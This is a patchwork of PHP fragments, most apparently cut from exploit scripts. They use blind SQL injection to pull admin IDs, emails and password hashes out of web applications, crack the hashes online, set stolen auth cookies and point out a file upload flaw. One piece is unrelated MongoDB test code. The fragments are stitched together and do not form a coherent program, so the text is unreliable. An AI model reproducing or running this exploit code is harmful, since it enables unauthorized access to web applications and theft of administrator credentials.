$match_upload = getparam('upmatch') != '' ? getparam('upmatch') : '\\;URL\\=index\\.php\\?site\\=files\\&file\\='; $match_blindsql = getparam('sqlmatch') != '' ? getparam('sqlmatch') : 'site\\=profile\\&id\\='; $proxy = getparam('proxy'); $authp = getparam('proxyauth'); $xpl = new phpsploit(); $xpl->agent("Mozilla Firefox"); if ($proxy) { $xpl->proxy($proxy); } if ($authp) { $xpl->proxyauth($authp); } print "\nAdmin id: "; $userid = blind('userID'); print "\nAdmin hash: "; $passwd = strtolower(blind('password')); print "\nLogged in (ws_auth={$userid}%3A{$passwd})"; $xpl->addcookie("ws_auth", $userid . "%3A" . $passwd); # File upload vulnerability # # +files.php # | # 42. $action = $_GET['action']; # 43. if($action=="save") { # 44. if(!isfileadmin($userID)) die(redirect("index.php?site=files", "no access!", "3")); # 46. $upfile = $_FILES[upfile]; # 69. $filepath = "./downloads/"; # 71. $des_file = $filepath.$upfile[name]; # 72. if(!file_exists($des_file)) { # 73. if(move_uploaded_file($upfile[tmp_name], $des_file)) { #
function blind($sn, $fmin, $fmax) { if ($fmax - $fmin < 5) { if (crack($fmin, $fmax, $sn) == 0) { print "\n\rEXPLOIT FAILED..."; credits(); } return; } $compare = intval($fmin + ($fmax - $fmin) / 2); $crcheck = ">" . $compare; if (check($crcheck, $sn) == 1) { blind($sn, $compare, $fmax); } else { blind($sn, $fmin, $compare + 1); } }
if (!preg_match("#NO HACK#i", $xpl->getcontent())) { print "[*] Attack failed.\n\n"; break; } print "[*] Login:\t"; $login = blind("email", $i); if ($login == "") { if ($i == 0) { print "\r[*] Attack failed.\n\n"; } else { print "\r[*] Attack failed (if you crack a hash, use -admin param).\n\n"; } break; } print "\n[*] Hash:\t"; $passwd = blind("mot_passe", $i); print "\n"; $md5 = strtolower($passwd); for ($a = 0; $a < sizeof($md5loc); $a++) { $r = crack($md5loc[$a][0], $md5loc[$a][1], $md5loc[$a][2]); if ($r) { print "[*] Password:\t{$r}\n"; break; } } if (!$r) { print "[*] Can't find the hash on the net, sorry.\n"; } else { attack($login, $r); die; }
function attack2() { global $queries, $mode, $admin_sid, $admin_uid; print "[*] Attack #2\n"; if ($mode != 2) { print " " . $queries[0][0] . " -> "; $admin_sid = blind($queries[0][1], 20, 48, 122); if ($admin_sid == "") { print "\r[*] No session found. Crack following MD5 hash and use -admin param.\n"; for ($i = 2; $i < 4; $i++) { print " " . $queries[$i][0] . " -> "; blind($queries[$i][1], 50, 48, 122); print "\n"; } exit; } else { print "\n " . $queries[1][0] . " -> "; $admin_uid = blind($queries[1][1], 20, 48, 122); print "\n"; finalattack($admin_sid, $admin_uid); } } else { print "\r[*] Getting admin credentials\n"; for ($i = 2; $i < 4; $i++) { print " " . $queries[$i][0] . " -> "; blind($queries[$i][1], 50, 48, 122); print "\n"; } exit; } }
var_dump($result); } catch (MongoCursorException $e) { echo "EXCEPTION: " . $e->getMessage() . "\n"; } } $m = new Mongo("mongodb://localhost:27017", array("replicaSet" => true)); $server = array(new Mongo("localhost:27017"), new Mongo("localhost:27018"), new Mongo("localhost:27019")); $count = 0; while (true) { usleep(100); $op = rand(0, 1000); switch ($op) { case 0: case 1: case 2: blind($server[$op]); break; case 3: case 4: case 5: case 6: case 7: case 8: unblind($server[$op % 3]); break; case 9: stepDown(); break; case 10: remove(); break;
function exploit($param) { echo "\nLet's define admin's " . $param . "\n"; $min = 48; # 0 $max = 122; # z $sql_cookies = makeExpl($param, 'BETWEEN ' . $min . ' AND ' . $max, 1); if (check($sql_cookies) == 0) { echo 'failed...'; return; } $sn = 1; while (blind($param, $sn, $min, $max) !== 0) { $sn++; if ($sn > 32) { return; } } }